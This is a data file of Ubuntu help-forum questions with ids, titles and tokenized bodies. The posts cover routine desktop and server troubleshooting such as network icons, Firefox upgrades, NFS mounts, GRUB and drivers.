416632	network icon problem in lxpanel in lubuntu	i have recently installed lubuntu-desktop in ubuntu 12.04 . in the lxpanel i have a network icon which shows my current network connection status . i have a wired connection [ ethernet ] which connects automatically at startup . in unity or gnome i observed that this icon changed to to arrows [ one up , one down ] when wired connection was established . but in lubuntu it showed `` disconnected '' time icon . how can i change this network icon to behave like in unity or gnome ? i am submitting image decribing the situation . thanks in advance for any help . edit if i connect to internet via mobile broadband the network icon vanishes !
416633	how do i deploy havana instead of grizzly ?	i 'm trying to install openstack havana dashboard but the dashboard is always grizzly ... i use juju and maas to deploy the charms on a bootstrap node , set the openstack-origin to : cloud : precise-havana to all of the charms - keystone , nova-compute , nova-cloud-controller , cinder , glance , quantum , openstack-dashboard but no success . always - grizzly . what am i doing wrong ?
416635	install latest stable version of firefox	just a few hours ago , i have noticed that there is a new version of firefox . firefox 27 . i have tried updating my ubuntu 13.10 system using sudo apt-get update & & sudo apt-get upgrade however , it does not seem like it is updating my firefox web browser . so , i have searched on the internet and found a similar post , also in askubuntu : how do i install the latest stable version of firefox ? which brought me to this page : https : //help.ubuntu.com/community/firefoxnewversion # firefox-stable_channel tried to add repository . sudo add-apt-repository ppa : mozillateam/firefox-stable but returns can not add ppa : 'ppa : mozillateam/firefox-stable ' . please check that the ppa name or format is correct . please help as i really like to test new things . edit i have just added another repository : sudo add-apt-repository ppa : ubuntu-mozilla-daily/ppa and did sudo apt-get update but i still ca n't install firefox . i still got firefox is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . but when i restarted my firefox and checked its version , it is still version 26.0 .
416639	my ubuntu version is showing ubuntu 13.04 version	my ubuntu version is showing ubuntu 13.04 version , but inside of sourcelist is showing like this below screen shot even i ca n't download many packages .
416640	cyborg r.a.t . 9 mouse keeps freezing	i just got myself a new cyborg r.a.t 9 mouse . the problem is that the mouse keeps freezing . well not really . i can still move the cursor around but i 'm not able to open/close anything . the clicks wo n't be recognized . as soon as i plug the usb to the laptop , the touchpad wo n't work either . it only works correctly when i unplug the usb again . what can i do ? thanks !
416643	native instruments traktor kontrol z1	sadly , as directed by native instruments support , there are no current alsa drivers available for the traktor kontrol z1 . http : //www.alsa-project.org/main/index.php/matrix : vendor-native_instruments the support team said i just need to wait until someone writes a linux driver for it . is there any way to sponsor someone to write drivers ? i 'm a web developer ( mostly php ) . how big a leap is it to look into writing a driver ? any recommendations on resources ?
416645	unable to check the ram usage per user	i was recently wanting to check the ram usage per connected user on my server but could not find a way out . please suggest some way .
416649	why are none of my startup commands being executed ?	i have been trying to get my laptop 's screen brightness to default to a low setting , and for my keyboard light to be off when i start my computer . i have these two commands that work when i execute them at the command line : xbacklight -set 7 echo 0 | sudo tee /sys/class/leds/asus : :kbd_backlight/brightness i put them in my /etc/rc.local file , like so : # ! /bin/sh -e # ... # by default this script does nothing . echo 0 | tee /sys/class/leds/asus : :kbd_backlight/brightness xbacklight -set 7 exit 0 however , neither command executes . ( i was told that the sudo was not needed in the second command when placed in /etc/rc.local ) there was another question asking the same thing about rc.local , but i tried to also include my commands using the startup applications gui interface . that also did not work , so i think the problem might go beyond just the rc.local file . other default startup commands in the list seem to start , so far as i can tell . why am i unable to get any custom command line to execute when i startup ? new : after some experimentation , it seems like the commands i put in /etc/rc.local might be getting executed before the login screen . so , my login screen has the screen appropriately dimmed . however , then when i login , my screen goes to maximum brightness . so it seems like perhaps there is some other setting that is being applied when i log in , or that /etc/rc.local only applies for the login screen itself and has no bearing on what happens to a user when logged in . so , how do i resolve this so that the brightness and keyboard light settings i want apply to the user login session , not just to the login screen ?
416653	eclipse always starts with /root/workspace	eclipse is always starting with /root/workspace . i select ~/workspace and check that i want to use this workspace only . but on every restart eclipse is trying to open with /root/workspace eclipse : kepler ubuntu : 12.04 lts
416654	ubuntu installation on hp dv2000	i 've been trying to get ubuntu to run on my hp dv 2000 with an amd turion x2 processor and an nvidia geforce 7150m / nforce 630m card . the problem is that i am getting horizontal lines on the screen . and the power button which should be in the far right is on the far left of the screen . display fails when i access dash home . i think there 's a problem with the nvidia drivers . also the wireless is not working . i tried to activate the broadcom wireless drivers in additional drivers but they do not activate . i am a complete newbie . any help will be appreciated .
416657	how to check scripts/jobs in batch mode with atq	is it possible to know which script is related to any job listed with atq ? read info on man at but could n't find the option . i would like to add a column to the following list with script name . atq 52123 wed feb 5 07:40:00 2014 a meteo 52129 wed feb 5 11:15:00 2014 a meteo 52125 wed feb 5 07:38:00 2014 a meteo 52127 wed feb 5 07:33:00 2014 a meteo thanks
416660	grub rescue wo n't go away !	as you can guess from the title i am a complete noob and stupidly to the dismay of all of you , i deleted the ubuntu partition deleting grub and ubuntu . so when i tried to install windows 7 , it said that it was an unknown filesystem . i am also trying to dual-boot windows 7 and ubuntu .
416662	getting hdmi out to work on precise with amd hybrid graphics	i am the ( unlucky ? ) owner of a dell latitude e6440 ( http : //www.ubuntu.com/certification/hardware/201306-13687/ ) with amd hybrid graphics ( intel + radeon hd 8690m ) . i have installed ubuntu and the necessary drivers using the recommended dell 's instructions ( http : //www.dell.com/support/drivers/us/en/19/driverdetails/product/latitude-e6440-laptop ? driverid=y24ff ) . the graphic drivers are provided by the fglrx-experimental13 package . most hardware is working out of the box , but i fail to get hdmi out working . do you guys have any ideas what to test before i eventually file a bug for it ? nb : my screen is not at fault , it works perfectly with another dell laptop with intel graphics only . when plugged , the screen shows up in hardware - > screen display , but remains black . vga is working fine .
416664	how do i see all git users from my private git server ?	i just installed git server on my ubuntu 12.04 server . it works well , but i do n't know all configurations . i know that i can see my pricate account using nano ~/.gitconfig but how to see all users who have a working account on that server ? i know there is some global config , but it did n't show me what i needed . i am also searching for the groups i created and who is in that group .
416666	no notification sound of google talk on ubuntu 12.04	everyone . i am using ubuntu 12.04 and chromium . the problem i am facing is that there is no sound notifications of the incoming message . after doing some search on internet , i found that may be this is because the flash player does not work properly . however , i can see videos on youtube and some other video sites . i can even see the ads present on the websites . i have found a threads ( how do i get adobe flash working in chrome or chromium on ringtail ? ) in the answer of which describe the exact situation i am facing . that is : on one hand , the official website tells that you have no flash player installed ; on the other hand , it can tell your installed flash player version . i do n't know how to fix this because the answer provided ask to delete .tmp file in home directory , which i did n't find exist . by the way , the notification sound functions well on firefox .
416668	diskless pc hangs when restarted	i 've done diskless setup : two diskless pc 's and one `` server '' with hdd . diskless `` nodes '' boot from pendrive ( or pxe also possible , same problem ) . when i try to restart `` node '' it hangs after a while with blinking cursor visible . what could be a problem ? i 'm using xubuntu 13.10 . best regs alex
416677	external hard disk , i/o error	i have been using a seagate 500 gb freeagent go flex drive and have been using it for the past year . but when i plugged it in yesterday , it says `` hard disk is unable to mount '' . here is the the error message : error mounting /dev/sdb1 at /media/jikson/freeagent goflex drive : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/jikson/freeagent goflex drive '' ' exited with non-zero exit status 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details .
416678	how to install windows and ubuntu on the same machine ?	i tried to install ubuntu on a machine having windows os.while installing ubuntu i was not able to see all the partitions and i had to format the hard drive . now the result is that i am having the clean hard drive with no primary partition and i am not able to install windows os also . please suggest me some steps to how can i install windows os and ubuntu on the same machine ? also suggest me steps to create primary partition . i googled but while following the steps got messed up.please suggest me some links .
416684	ubuntu touch stuck on the initial screen after successfully installed by android dual-boot installer on galaxy nexus	as the title said , it stuck on the initial screen with `` google '' icon and an unlocked bootloader icon . this occurs every time i tried to reboot into ubuntu touch within the dual-boot app . android 's boot is in normal condition . the space left in /cache is reduced by about 2.7g after the installation . is it because some thing like ubuntu touch 's boot has being swept and lost forever after the shutdown during the reboot procedure for the first time ? so which dir it should be in so that it wo n't be lost again ? and how can i get the boot back ? or any other reason ? only mtd0 ( media ) & mtd0ro ( root ) in /dev/mtd . maguro , yakju , android 4.3 . really appreciate your help ! -- -seems that it 's not about dualboot or multirom kinda things now . even i flashed my gnex with the touch-armel-maguro.zip & touch-armhf.zip here using cwm i got a black screen without any response after the initial screen , regardless of the multirom aiming to nexus 5 , far later than gnex . meanwhile i found this page . seems that better not consider this any more before throwing gnex away .
416685	black screen after splash and partition file system unknown	problem since yesterday . when i boot the computer , after the splash logo , the screen turns black . i can go to a tty screen , but anything that i try to open graphically fails . ( i am not the most experienced terminal user . ) last actions before the problem the only thing i can remember doing before this problem started is , installing extra tex-live packages and updating the computer . i do n't remember what it was that needed updating . what i have done so far ( 1 ) gparted tells me one of my small partitions ( ~4 gb has a unknown file system ) . i have n't created such a small partition , and i am not sure from which other partition this has been 'taken ' . i checked this post my computer boots to a black screen , what options do i have to fix it ? and i looked at the answer about `` if this occurred after an update '' , i will have a look at the boot partitioning issues . to see if i can find out more . update : the 4gb partition apparently was my swap partition . i reformatted it to swap , the problem did not get fixed and this partition is back to being of a file system `` unknown '' . ( 2 ) recovery mode does n't 'open ' , i.e . on different options , partitions are checked and then nothing . ( 3 ) boot-repair did n't fix the problem ( http : //paste.ubuntu.com/6878058 ) , but i reckon the boot is indeed not the problem . ( 4 ) other similar problems i found on forums were either with 12.04 upgrade to 12.10 ( i have 13.10 64 bit ) , or it seems to have to do with their graphics cards . however i did not change anything about the graphics as far as i can remember for months . my system i have ubuntu 13.10 64 bit , single boot with several partitions , amd64 athlon ii x3 , 3.2 ghz , 4gb ram , ati radeon hd4250 . what now ? i will now keep on finding new things to try , but some of them are bit too complicated for me . if anyone can help me , you 're help is very much appreciated .
416686	rename command special characters in filename	i would like to remove [ ] in multiple file names . i get an error when doing it with the rename command . is there another way to do this ?
416692	force ubuntu server locale to windows client	i 'm trying to setup ubuntu server as domain controller using samba and it all works great . i can login , get personalized settings and user directory pathed in the clients at login . all except for one thing , the locales on clients ( 1 x windows xp & 1 x windows 7 ) are forced to us locales ( keymapping being the most annoying ) . during client installation i 've chosen swedish settings in both language and keymap ( also removed the english ones ) .i 've changed the locales on the server to sv_se.utf-8 just in case the server forces it through that way . but still no luck . i can change it locally on the client but i want to learn how to make the server to keep the settings instead . i am pretty comfortable using windows server & clients but kind of new to linux . i 've read a lot of documentation and still not found anything useful . the question really is : can you make the server to push locales to the clients ? sorry for any grammatical errors and bad/wrong information given . looking forward to any reply that can help me along to any information regarding this .
416693	adobe flash player slow in linux fullscreen	i am running linux mint 14 on a laptop with nvidia optimus graphics card . the browser and flash payer is running on the integrated graphics card . flash player framerate sometime drops while in fullscreen . it 's not always but it only happens in fullscreen . as soon as i exit fulscreen it plays well ( e.g . youtube ) . hardware acceleration is enabled in flash . this is the statistics displayed in fullscreen while the framerate is low : timestamp seconds 386.530 1280x720 , 0 average kbps , 23 % volume tagstreamplayer , http , 1887 kbps 10 stage fps , 30 video fps , 5777 dropped , 0 kbps software video rendering , software video decoding -14.939 db , 0.497679518392039 audio factor the temperature does not seem to be too high . $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +62.0°c ( crit = +108.0°c ) asus-isa-0000 adapter : isa adapter temp1 : +62.0°c coretemp-isa-0000 adapter : isa adapter physical id 0 : +62.0°c ( high = +86.0°c , crit = +100.0°c ) core 0 : +62.0°c ( high = +86.0°c , crit = +100.0°c ) core 1 : +62.0°c ( high = +86.0°c , crit = +100.0°c )
416694	qdebug ( ) output is not visible on a terminal	i use ubuntu 12.04 lts . when i run a console application using qt creator an output of qdebug ( ) is not visible on a terminal ( i get only an empty terminal with a cursor ) . how to fix that ?
416695	error when install ubuntu on virtual box	i`m wanting to install ubuntu 13.10 on virtual machine ( virtualbox ) but i got an error when i want to boot ubuntu . . this kernel reguires the following features not pasent on the cpu : pea unable to boot - olease use a kernel appropriate for your cpu can anybody help me ?
416697	how can i see the properties of a result in unity 's dash home search ?	for example , i would like to see where my search 's resulting file is located . obviously right clicking on the result will not work , so , is there an add-on or setting that could give me a context menu for the search 's result ? thanks in advance !
416699	is there a way to get information about an auto reported bug ?	when i try suspend to ram and resume , system freezes . on next session system detects the problem and gives me a way to report it to developers . this problem has been there a long time . is there a way to know what developers are doing for the issue if anything ? is there a bug tracker for such issues ? i would like to use suspend to ram , since my computer uses relatively lot electricity and i want to save it while i take a break .
416703	ubuntu 12.04 lts - network manager not listing wireless networks	i 'm running ubuntu 12.04 on a lenovo ideapad z580 . for the last 3 days , the wireless network icon no longer displays ( and i ca n't connect to ) two networks that i was previously connecting to and that other users and my phone are stil able to connect to without difficiulty . however , it continues to display a dozen other networks in the building . exactly the same problem is described here : ubuntu 12.10 - network manager not listing wireless networks but unfortunately the solutions listed there do not resolve the problem for me . i 've also tried the suggestion given here : ubuntu 12.04 not connecting to some wifi network but to no avail . the information given here also fails to resolve my problem : https : //help.ubuntu.com/12.10/ubuntu-help/net-wireless-find.html one other thing i tried was booting a previous kernel , but that did n't help . here 's the relevant output from lspci and ifconfig sudo lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 635m ] ( rev a1 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 04:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) sudo ifconfig eth0 link encap : ethernet hwaddr 08:9e:01:6a:7e : be inet addr:192.168.1.16 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :a9e:1ff : fe6a:7ebe/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11025 errors:0 dropped:0 overruns:0 frame:0 tx packets:3333 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2690159 ( 2.6 mb ) tx bytes:429359 ( 429.3 kb ) interrupt:43 base address:0x8000 eth1 link encap : ethernet hwaddr 08 : ed : b9:99 : c0:97 inet6 addr : fe80 : :aed : b9ff : fe99 : c097/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:28 tx packets:0 errors:23 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:756 errors:0 dropped:0 overruns:0 frame:0 tx packets:756 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:58543 ( 58.5 kb ) tx bytes:58543 ( 58.5 kb ) i would be most grateful for any suggestions .
416707	driver backporting and kernel panics	i have a intel 7260 wan adapter and i could not find any driver compatible with a stable kernel release , so i had to use 13.14 . although the wan works fine now , i get frequent ( 1/day ) kernel panics : `` kernel panic - not syncing : fatal exception in interrupt '' my questions are : 1 ) is there any easy way i can do the backporting of the driver by myself ( i have no experience in this field , and there are no already backported drivers for my adapter ) 2 ) is there any way i can still use this driver ( compatible only with 13.10+ , excluding 13.10 ) , after switching to a lower kernel version ? 3 ) any advice on how to avoid getting this kernel panic ? i am not doing anything particularly different when i get it . it usually happens while i am navigating internet ( on ethernet though , not on wifi ) .
416708	can not connect to ubuntu 12.04 with rdp , but can with rdp app	just set up a ubuntu box and installed xrdp so i can remote onto it from my work station . i can not connect with mstsc , however when remoting in from the microsoft rdp app on my mobile , it works fine , no problem . upon rdp via desktop , i get the typical xrdp screen where i chose my module and put in my credentials . i put in the correct credentials each time but i just get xrdp_mm_process_login_response : login failed . i 'm just slightly confused why i can successfully log in with the rdp app from microsoft from my mobile , but not via mstsc from my desktop . i 've followed a few guides for this to see if i 've missed anything crucial but i have n't and it 's bugging me now.. : ( cheers , ash
416715	gnome move to last used workspace	i 'm using ubuntu 12.04 , with gnome 3.4 , and with the `` workspace grid '' plugin , i separate all my application all over 4 workspaces - workspace1 : email and messenger workspace2 : browser workspace3 : file browser , files , office apps workspace4 : terminal , rdp i used the alt ctrl + < arrow key > shortcuts to move between the workspaces , but i 'm missing one shortkey - to go to last used workspace , for example in tmux and gnu screen you can move between panels and windows , and always you can go to the `` last used window/panel '' shortkey is there an option to set the same `` last used workspace '' shortkey with gnome ? thanks .
416716	scanning 35mm film with epson 4490 in ubuntu	i have read the guides on downloading drivers for the epson 4490 from epson and vuescan from hamrick.com , but am unclear on whether ubuntu will let me use the film scan utility ? can anyone confirm i can use all the scan modes in ubuntu with this scanner before i obliterate my windows os ? thanks
416719	kmymoney 4.11.3 on line stock update showing error	copy of screen shot with error message attached . used financial : quote with india mutual ( amfi ) . code & url are correct . amfi file gets downloaded into tmp folder . but price is not getting updated . please suggest corrective measure
416720	do i need to run grub update after cloing my ubuntu partition to my new ssd ?	i am relatively new to ubuntu , been using 12.04 lts for a few months . i have it installed on a 160gb seagate rotating media drive dual booting with windows vista and all has been going well . i recently installed a 120gb kingston hyperx ssd and used clonezilla to clone the ubuntu partition to the ssd . this worked fine and with only the kingston connected i can boot to it with no issues . ultimately i intend to boot from the kingston ssd and use the seagate for data , occasionally booting to vista . ( leaving the original ubuntu installation on the seagate as a backup ) when my pc starts up i hit esc to get the boot menu , choose the kingston , get the grub menu and intermittently it appears to actually start from the seagate ; i know this because i can hear the disk being accessed as well as seeing the space available for ubuntu in system monitor . with only the kingston connected ubuntu starts fine so i know it functions - but with the seagate also connected i think ubuntu is getting confused at the grub menu , sometimes starting from the seagate and sometimes the kingston . my question is ( aside from nuking the ubuntu installation on the seagate ) do you think i need to run grub update , with only the kingston connected , to let the system reorient itself to it 's new home ? thanks in advance .
416725	failure to run applications in 12.04	i load applications from the ubuntu software centre , but there seems to be a black hole into which some of then disappear , never to be seen again , i miss the tool bar at the top of the 10.04 screen
416726	12.04lts - readahead.2.gz or advanced readahead deamon ?	it takes about 22 seconds to load firefox . i ca n't find the 'advanced readahead deamon ' in the ubuntu center . can i use : -readahead.2.gz ?
416728	reduce screensaver timeout to a custom value in seconds	i have a box running ubuntu 13.10 unity that i need to auto log in and it currently locks after 30 seconds , but i 'd like to reduce this to between 1 and 5 seconds - how can i do this ? cheers
416732	where command does n't work properly	where grunt while running this i get the following error message no command 'where ' found , did you mean : command 'gwhere ' from package 'gwhere ' ( universe ) where : command not found
416738	i broke ubuntu - help me reinstall	i have only had ubuntu installed for a few days , completely removing windows 8 . not knowing what i was doing , i have caused way too many problems with ubuntu and need to reinstall . the big problem is that i can no longer login . after entering my password nothing happens . i have tried many solutions offered here but with no results . i do not know how to reinstall from the dvd . please help . if it matters , i am using an hp pavilion g7 amd . thanks .
416741	why is nfs not allowing me to mount a share ?	the host i have a host , running ubuntu 12.04 , at 10.0.0.202 . it provides an nfs share for other machines on the network . here is the contents of /etc/exports : /media/storagedrive 10.0.0.0/24 ( rw , sync , no_subtree_check ) the intention here is to share the contents of /media/storagedrive to other machines on the network in the ip range 10.0.0.0 - 10.0.0.255 . working client this works correctly with a client machine at 10.0.0.40 , running ubuntu 13.10 , known as mattdev . that machine 's /etc/fstab looks like this : uuid=8f8c838e-3ea2-457a-87f0-57b12dfab06c / ext4 errors=remount-ro 0 1 uuid=427089d4-46a2-432d-9df4-7016bdfc7df2 none swap sw 0 0 10.0.0.202 : /media/storagedrive /mnt/networkstoragedrive nfs rsize=8192 , wsize=8192 , timeo=14 , intr and ls -al /mnt/ on that machine looks like this : total 12k drwxr-xr-x 3 root root 4.0k feb 4 17:48 . drwxr-xr-x 23 root root 4.0k feb 5 08:44 .. drwxrwxr-x 7 root plugdev 4.0k feb 5 11:43 networkstoragedrive the output of id looks like this : uid=1000 ( matt ) gid=1000 ( matt ) groups=1000 ( matt ) ,4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,33 ( www-data ) ,46 ( plugdev ) ,112 ( lpadmin ) ,124 ( sambashare ) non-working virtual client i have a second client machine , running ubuntu 12.10 , as a guest os on a windows 7 host machine . the host machine is on the network as 10.0.0.28 . the guest machine is being managed by vagrant , using virtualbox 4.3.6 as a provider . i 'll call the windows 7 host alexdevhost and the ubuntu guest alexdevguest . running showmount -e 10.0.0.202 on alexdevguest produces : export list for 10.0.0.202 : /media/storagedrive 10.0.0.0/24 however , when i try to mount the share , it fails : $ sudo mount 10.0.0.202 : /media/storagedrive /mnt/networkstoragedrive mount.nfs : access denied by server while mounting 10.0.0.202 : /media/storagedrive so i started looking for issues : $ ls -alh /mnt/ total 12k drwxr-xr-x 3 root root 4.0k feb 5 12:23 . drwxr-xr-x 26 root root 4.0k feb 5 12:23 .. drwxr-xr-x 2 root root 4.0k feb 5 12:23 networkstoragedrive $ id uid=1001 ( vagrant ) gid=1001 ( vagrant ) groups=1001 ( vagrant ) $ that uid and gid is different to the user matt on mattdev . so i juggled about the uid for vagrant , as i have read that nfs access is controlled by matching the ip address and uids . so now : $ id uid=1000 ( vagrant ) gid=1001 ( vagrant ) groups=1001 ( vagrant ) $ sudo mount 10.0.0.202 : /media/storagedrive /mnt/networkstoragedrive mount.nfs : access denied by server while mounting 10.0.0.202 : /media/storagedrive $ still no success . so now i 'm running out of ideas . what am i doing wrong ? if the uid part is correct , is there a way i can verify that the nfs server machine is seeing my access attempt as coming from 10.0.0.28 , and not some other ip not in the allowed range ?
416745	libgnome-window-settings-dev - package not found	i use ubuntu 12.04 lts - i have to install all dependencies listed here : link apt ca n't install libgnome-window-settings-dev sudo apt-get install libgnome-window-settings-dev package not found . how to fix that ?
416748	stop cursor from moving when scrolling in a textbos	i 've installed imwheel to edit my scroll speed , and in the config i have : '' . * '' none , up , up , 3 none , down , down , 3 and when i scroll inside a textbox , my cursor ( the blinking line where i start typing , not sure if it 's reffered to as a cursor ) moves to the next line . how can i fix it ? ( i am unsure if the problem is something with imwheel , but i though i 'd point it out )
416749	switch between keyboards	i have two text entry resources : english & persian . i had defined alt+l shft to switch between them . then i installed `` unity tweak tool '' and `` compizconfig settings manager '' . after the very first run of these two , alt+l shft do n't change keyboard & i have to do it via clicking on language bar . i can not find any specific configuration about keyboard in these two either . should i uninstall them , or there is another way ? thank you
416750	linux kernel 3.11.10 installation error	i installed kernel 3.11.10 and now i 'm getting this error message : the package linux-headers-3.11.10-031110-generic needs to be reinstalled but i ca n't find the file to do it . what can i do to fix it ?
416751	huawei e173s modem dongle is recognized only on usb port 2	i finally made my huawei e173s usb modem work on ubuntu 12.04 lts and asus 1015e-ds03 netbook ( sandy bridge ) but it is only recognized on port 2 . does any body knows why is this ? is there anything i can change ( rules , conf , etc ) to make it work on other ports ? thanks !
416755	going back to windows , but do n't know how ?	i have installed ubuntu and thought i dual-booted it ... but i did n't , so now i wan na go back to windows ( i have a windows 8 cd ) but when i insert the disk into cd/dvd drive and change my boot menu it still boots in to ubuntu . i installed ubuntu over win7 home premium using a livecd , it 's said that no filesystem was recognized on my laptop , so i thought it was automatically placed on the unallocated partition that i 've created . but it did n't , so it just deleted my windows partition and installed ubuntu on it . what is the problem and how can i solve it ? thanks ! edit : i do n't know much about computers but i just got this hp pavvilion dm1 whit windows 8 isntalled on it and updated it to 8.1 i installed ubuntu the this way : making a new partition , and making the swap and boot or something my self by clicking ''something else '' ps : i do n't have a dvd drive
416756	lxc-create with non default user	when using `` lxc-create -t ubuntu '' how does one specify the user of the new container ? i do n't want the default ubuntu : ubuntu but to specify my own unique username and password . i 'm using lxc 1.0.0~beta3 on ubuntu 14.04 .
416759	why do i get different free space results ?	i 've got a separate /home when i run df -h in terminal i get the result like size 70gb used 64gb available 2.5gb so where is the rest ? but when i run gparted it shows size ( 70gb ) /used ( 64gb ) /free ( 6gb ) - which seems to be right . so why is it so different ?
416761	how do you use a ubuntu flash drive to boot the computer	i have downloaded the ubuntu on a flash drive and followed all of the directions . i have searched the forum and apparently there is o solution for starting ubuntu on a 32 bit windowsxp from a flash dive . it seems that all instructions have never encountered the questions that windows xp asks when you go into the bios . the people who put up a web site or a tutorial on youtube omit the necessary things to complete the set up . i have been frustrated with ubuntu as it took me 15 cd 's and 3 weeks to actually be able to run it on my computer . i am sorry that i am not a computer whiz . i can not make ubuntu open on a flash drive , never have been able to and if you reply with go to ubuntu download the flash drive . please do not reply . i need answers and not people looking down on me because i do not know how to config a bios . forgive me . i have tried for over an hour to sign into this site for help and i found that my email address was in use and when asking for my user name to be sent , it said there was no account with email adress.i wonder if there is any help on ubuntu unless you are a computer whiz and no all about computer language . sorry for the rant but how does one actually create a usb drive that will boot on windows explorer ?
416762	deactivating swap file without any computer freeze	i 'm currently coding on my laptop : 4 gb of rams , never using more than 2.5-3gb but at times , i 'll mess up my programs , run them with memory leaks and they 'll make the computer freeze when trying to write in the swap file ( something related to low value of swapiness ) . it put me close to losing important data a few times and so i 'd like to have my computer working another way : no swap file , as i said i 've never needed more than 3gb of ram when using it , and making the os crash a program that would try to use more ram than available ( it will always an ill coded program of my own ) . how can i get my setup this way ? thank you in advance .
416763	ibus keyboard layout changing but can not type in tamil	i 'm using lubuntu 13 . 10 in my desktop and i 'm trying to type `` tamil '' characters in libber office writer i have installed m17n packages and installed the keyboard layout `` tamil - phonetic ( m17n ) '' from `` ibus preferences '' as in the answer given for `` how do i turn on phonetic typing for tamil ? '' by jokerdino i could see the ibus icon in the system tray and i could change the keyboard layout from `` english - english ( us ) '' to `` tamil - phonetic ( m17n ) '' by using < super > + < space > keys or by clicking on the ibus icon from the system tray i could n't type in `` tamil '' even after changing the layout to `` tamil - phonetic ( m17n ) '' i also tried the layouts `` tamil - tamil99 '' , `` tamil - itrans ( m17n ) '' etc . but i could n't type a single `` tamil '' character ... i wish to type in tamil in my instant messengers , browser , writer etc .
416769	problem installing apt-proxy	i have ubuntu 12.10 and i wish to make this machine a mirror for apt-get requests . i made successfull installation of apt-proxy using sudo apt-get install apt-proxy i followed following link : https : //help.ubuntu.com/community/aptproxy hence i uncommented some of lines from /etc/apt-proxy/apt-proxy.conf apt-proxy repository see : http : //apt-proxy.sourceforge.net/apt-proxy/readme add_backend /apt-proxy/ \ $ apt_proxy_cache/apt-proxy/ \ http : //apt-proxy.sourceforge.net/apt-proxy/ and add some like : [ ubuntu ] ; ; ubuntu archive backends = http : //archive.ubuntu.com/ubuntu http : //de.archive.ubuntu.com/ubuntu then , it tried initializing it using sudo /etc/init.d/apt-proxy restart but it showed me sudo : /etc/init.d/apt-proxy : command not found i m now confused with what to do . please help me to solve this problem .
416770	only 'previous linux versions ' works , after do a 'make install ' of the 'media tree '	i was trying to get my webcam to work . then i went on this website , i followed the step by step , and did the 'make install ' command . all occurred normally , however when i reboot , the system no longer worked . i can only access by the option 'previous linux versions ' on the grub . what can i do to revert the changes i did ?
416773	how do i get from the shell to the actual os ?	i just installed ubuntu for the first time and have no idea how linux works in general . i used the windows installer and after a reboot i end up in a shell ( ? ) with commands and have no idea what to do . how do i enter the actual os with gui ?
416775	menu items unclickable in many software	the global menu items of many software in ubuntu 13.10 are unclickable . firefox menu items work fine , while gnome terminal global menu items are all unclickable except for `` change profile '' and `` set charater encodig '' . in gedit global menus , only `` highlight mode '' in `` view '' is clickable ! what to do ?
416776	wna1000m driver is already installed but no internet	i installed lubuntu desktop on ubuntu 12.04 today . it installed successfully . i have netgear wna1000m micro usb adapter and its driver seems to be installed properly ... only problem is how many ever times i have tried , i can not access the internet . if i try making a cable connection , the computer does not recognize it and i ca n't access the internet . please help ... thank you in advance .
416777	usage unit in powertop	when i use the powertop utility , the usage column values are measured in ms/s or us/s . i 'd assume the second s is second but what is the first s ?
